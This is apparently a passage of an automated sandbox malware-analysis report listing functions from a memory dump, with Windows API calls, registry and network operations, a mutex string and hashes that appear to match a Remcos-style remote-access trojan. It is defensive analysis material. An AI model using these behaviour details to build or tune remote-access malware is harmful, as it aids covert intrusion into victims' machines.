                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,123A4EE0,123A5598,?,?,?,?,12345CD6,?,00000001), ref: 12334FCD
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,12335150,?,00000000,00000000), ref: 12334FE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 12334F94
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                          • API String ID: 2532271599-1507639952
                                                                                                                                                                                          • Opcode ID: 76611963143195156edef1685e4905481504dfdadfb6de474345d06651055905
                                                                                                                                                                                          • Instruction ID: 5a1789b492e677f5856cf55d61907449179f6bea567c30a58505ecdad4ae6492
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76611963143195156edef1685e4905481504dfdadfb6de474345d06651055905
                                                                                                                                                                                          • Instruction Fuzzy Hash: B111E37A8043886EDB22A7768C0CEEF7FACDBD6311F04460EE54196251DA706645CBB2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 1234377E
                                                                                                                                                                                          • RegSetValueExA.KERNEL32(?,123974B8,00000000,?,00000000,00000000,123A52F0,?,?,1233F853,123974B8,4.9.4 Pro), ref: 123437A6
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?,?,?,1233F853,123974B8,4.9.4 Pro), ref: 123437B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                                          • Opcode ID: 2321a0d96a8d387a436bbcfad9b88ec25692159e380376124137589657c34457
                                                                                                                                                                                          • Instruction ID: 6fad0df00cfc15c2d32ad180353f9f51bfa596f8b9060b0adf8531de107461e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2321a0d96a8d387a436bbcfad9b88ec25692159e380376124137589657c34457
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F06DB2540118FBCB029FA0DC45EEA3B7CEF04651F208654FD49AA110EB31AF14EB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,123A4F50), ref: 12334DB3
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,123A4EF8,00000000,00000000), ref: 12334DC7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 12334DD2
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 12334DDB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579639479-0
                                                                                                                                                                                          • Opcode ID: 9d80ccc7d2379aca4bdba0294ba6cb2707412b22ff0e8fa57f0898a484bb289b
                                                                                                                                                                                          • Instruction ID: 6b9276c6ff73d2ff96f3c841caf1330dda8f9e6fcc3d4b9b4e4c703475a35918
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d80ccc7d2379aca4bdba0294ba6cb2707412b22ff0e8fa57f0898a484bb289b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41B47A6483056FC766DB60CC54DBFB7EDEF84312F400A1DF592922A1DB20EA09C762
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1233A74D), ref: 1233A6AB
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,1233A74D), ref: 1233A6BA
                                                                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,1233A74D), ref: 1233A6E7
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,1233A74D), ref: 1233A6EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4068920109-0
                                                                                                                                                                                          • Opcode ID: 35a06592033898afd6a939173cecd4257049bf0d8f44278e9b3455d394d8e44b
                                                                                                                                                                                          • Instruction ID: 048675c99df3f6a57b6239930f342c5bb5aee1adf32037fadf182578a0a63786
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35a06592033898afd6a939173cecd4257049bf0d8f44278e9b3455d394d8e44b
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED115072E80354AEDA23562488D4A7E3B5EBB81357F000A18E287877C1C7616A47C361
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 1234C4B2
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1234C4D7
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 1234C4E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2135649906-0
                                                                                                                                                                                          • Opcode ID: d76b6f5e23ff4ca299426cfe258b34abaa4837b6cec16f83a42ab5bdc06909e8
                                                                                                                                                                                          • Instruction ID: c4004a89e94ce99d6a1ac9a909fb40b684ac8546c756ab93fd5d7bcb9470874b
                                                                                                                                                                                          • Opcode Fuzzy Hash: d76b6f5e23ff4ca299426cfe258b34abaa4837b6cec16f83a42ab5bdc06909e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0C2B23412187FE2121A209CC4FBB379CEBC66A5F110B29F942E23C0CA614D058231
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,1233EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,123960BC,00000003,00000000), ref: 1233D078
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1233D083
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                          • String ID: Rmc-W5UGP5
                                                                                                                                                                                          • API String ID: 1925916568-504190447
                                                                                                                                                                                          • Opcode ID: eeebc4273c3c0fc154a895c596515bb875b38552ca0d397f456edab52f9fc7d5
                                                                                                                                                                                          • Instruction ID: 67b21f168588dbe5647b6d1c1fb3f5ad9c83da0eb4b74c57492f41a8211bc7a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: eeebc4273c3c0fc154a895c596515bb875b38552ca0d397f456edab52f9fc7d5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CD012F5AA42249FD7191770C8D976C3DA897D4702F400929F40BC9AC0DB6485908A12
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334B36
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,1233547D,?,?,00000004,?,?,00000004,?,123A4EF8,?), ref: 12334B47
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,123A4EF8,?,?,?,?,?,?,1233547D), ref: 12334B75
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3963590051-0
                                                                                                                                                                                          • Opcode ID: 282dfe3da2cb70833376d5180a853a292da27e8d4d04278f977175055ae709d8
                                                                                                                                                                                          • Instruction ID: ce325d75e1f1e4dd22e728b6c8ca8cd5b6b9d8c45989e4929eab1b65786b2d2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 282dfe3da2cb70833376d5180a853a292da27e8d4d04278f977175055ae709d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C2141B7900119ABCF56DBA4EC84DFEBB7CBF18311B004615E915A21A0EF34BB15CAA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123435A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 123435CA
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 123435E7
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 123435F2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: f7f2f3f922c4b1e51db39a58948e74797524069b4c8b00cdb43833a810676091
                                                                                                                                                                                          • Instruction ID: 136d57eac59c77ed4ac2bdd0153f07055c0c198c618dd0da6eaeaea7a2aa51a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f7f2f3f922c4b1e51db39a58948e74797524069b4c8b00cdb43833a810676091
                                                                                                                                                                                          • Instruction Fuzzy Hash: 740186BB900129BBDB219B95CC89DDE7FBDDB84250F104195FB09E7200DB359E15DBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123436F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,123A52F0), ref: 12343714
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 1234372D
                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 12343738
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: b3ff98c9637f53751019f5f0b0d9d9efc3afb98dab8f76f8e01c647d9ec2ca56
                                                                                                                                                                                          • Instruction ID: 4d7aa2fded3ceff8c412f2c4a6c2098e86c7cb7db4057d6bf1875e39727c63c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: b3ff98c9637f53751019f5f0b0d9d9efc3afb98dab8f76f8e01c647d9ec2ca56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C014BB6440129BFCF225FA1CC48DEA7F7CEF05761F104694FE0866120D6318A65EBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12343549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 12343569
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,123A52F0), ref: 12343587
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 12343592
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: 2f07525319f8408581c07205b845cc3e2855e58be5128fdf2315596be54abba2
                                                                                                                                                                                          • Instruction ID: 32bb83332bfa9cc04af54ad965fe369f5430167ba563337b2ab838697676f66e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f07525319f8408581c07205b845cc3e2855e58be5128fdf2315596be54abba2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F017B6940218FFDF119FA09C45FEEBBBCEB44710F2041A5FA08EA241E6315B14AB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123434FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,1233C19C,12396C48), ref: 12343516
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,1233C19C,12396C48), ref: 1234352A
                                                                                                                                                                                          • RegCloseKey.KERNEL32(?,?,?,1233C19C,12396C48), ref: 12343535
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                          • Opcode ID: ec45fe777171cfab8b809097f28f27dd42d4f6dbe03a3e872828e0f238579608
                                                                                                                                                                                          • Instruction ID: 6e5ed8f64ec05aab69d00bd4c8c2ebd0556c43b0af6f484a1d8ae0ec9ecf4157
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec45fe777171cfab8b809097f28f27dd42d4f6dbe03a3e872828e0f238579608
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60E093B2441134FBDF214B929C4DED77F6CDF457A07100184FD0C56101D6214E10D5F0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12343877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,123960A4), ref: 12343885
                                                                                                                                                                                          • RegSetValueExA.KERNEL32(123960A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438A0
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(123960A4,?,?,?,1233C152,12396C48,00000001,000000AF,123960A4), ref: 123438AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                                          • Opcode ID: c66fb929b386eb7d451f9625fb16d6a1a75e79b8625389a9106a6b840c11f87c
                                                                                                                                                                                          • Instruction ID: 637ba79159528cfb63f4e62c0f9a75f0be4675999e0fd4ff5badfe3e40ccab38
                                                                                                                                                                                          • Opcode Fuzzy Hash: c66fb929b386eb7d451f9625fb16d6a1a75e79b8625389a9106a6b840c11f87c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E065B2540218FBEF125F908C45FDA7B6CDF44750F104694FF08AA241D7318F189790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,123A4EF8,12334C49,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334BA5
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1233548B), ref: 12334BC3
                                                                                                                                                                                          • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 12334BDA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventObjectSingleWaitrecv
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 311754179-0
                                                                                                                                                                                          • Opcode ID: 3103486ce0c473fc08846a237ebf27752cc9fa34c563c3b5aa6c7a27da9d5640
                                                                                                                                                                                          • Instruction ID: 18285103b3e8cff4d0dabdd08dc74060138eaf3938ecc5d758678325dd84f3e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3103486ce0c473fc08846a237ebf27752cc9fa34c563c3b5aa6c7a27da9d5640
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0827B108122BFDB168B10EC49E49FBAAFF84721F108719F554522A08771FC20CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 1234B7CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 1890195054-2766056989
                                                                                                                                                                                          • Opcode ID: a036a345f30bf25ecfe0758cb2782774fd381fa667e684a75faaf845e31ee1a5
                                                                                                                                                                                          • Instruction ID: 282991f77563a7be06d76186f3c3b75335129a32d76268e2cbfcdba1e71fb755
                                                                                                                                                                                          • Opcode Fuzzy Hash: a036a345f30bf25ecfe0758cb2782774fd381fa667e684a75faaf845e31ee1a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D017B580232CDFC720DFA8E844A8DBBFCFB08210F00456AED49E3700E770A8008B84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12345AEA Relevance: 3.2, APIs: 2, Instructions: 163COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountEventTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 180926312-0
                                                                                                                                                                                          • Opcode ID: badd25df68cb9b8ff8bfd47f7d630d310c80acd28ce9e07d2ecbdef5cb2702f1
                                                                                                                                                                                          • Instruction ID: a292a64b014ee10d98d040836429e254137e8ea962d5017f60515fe3ae44ad8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: badd25df68cb9b8ff8bfd47f7d630d310c80acd28ce9e07d2ecbdef5cb2702f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52516E3B5083405AC7BAEB21D890ABFB3E5AF91711F504A6DD586871D4EF307A09C642
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                                          Download Yara Rule
